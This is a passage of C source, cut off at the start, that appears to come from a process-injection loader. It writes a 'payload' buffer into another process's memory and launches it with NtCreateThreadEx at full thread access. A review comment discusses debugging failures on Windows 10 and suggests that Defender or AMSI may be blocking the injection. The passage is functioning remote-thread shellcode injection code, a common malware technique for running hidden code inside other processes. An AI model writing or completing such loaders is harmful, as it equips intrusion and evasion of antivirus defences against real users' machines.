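    /* Write the payload bytes (sizeof buf, not region_size, which is now page-rounded). */
    status = NtWriteVirtualMemory(pi.hProcess, remote_buf, buf, (ULONG)sizeof buf, NULL);
    if (!NT_SUCCESS(status)) {
        rc = 5;
        goto cleanup;
    }
    /* 0x1FFFFF is THREAD_ALL_ACCESS as defined for Vista and later. */
    status = NtCreateThreadEx(&hRemoteThread, 0x1FFFFF, NULL, pi.hProcess,
                              remote_buf, NULL, 0, 0, 0, 0, NULL);
    if (!NT_SUCCESS(status)) {
        rc = 6;
        goto cleanup;
    }
    /* NOTE(review): nothing here is Win10-specific beyond the RegionSize bug
     * above; if the x64 build still fails only on Win10 after that fix, check the
     * Defender/AMSI event log before assuming an OS-level injection block. */

cleanup:
    if (hRemoteThread != NULL) {
        CloseHandle(hRemoteThread);
    }
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return rc;
}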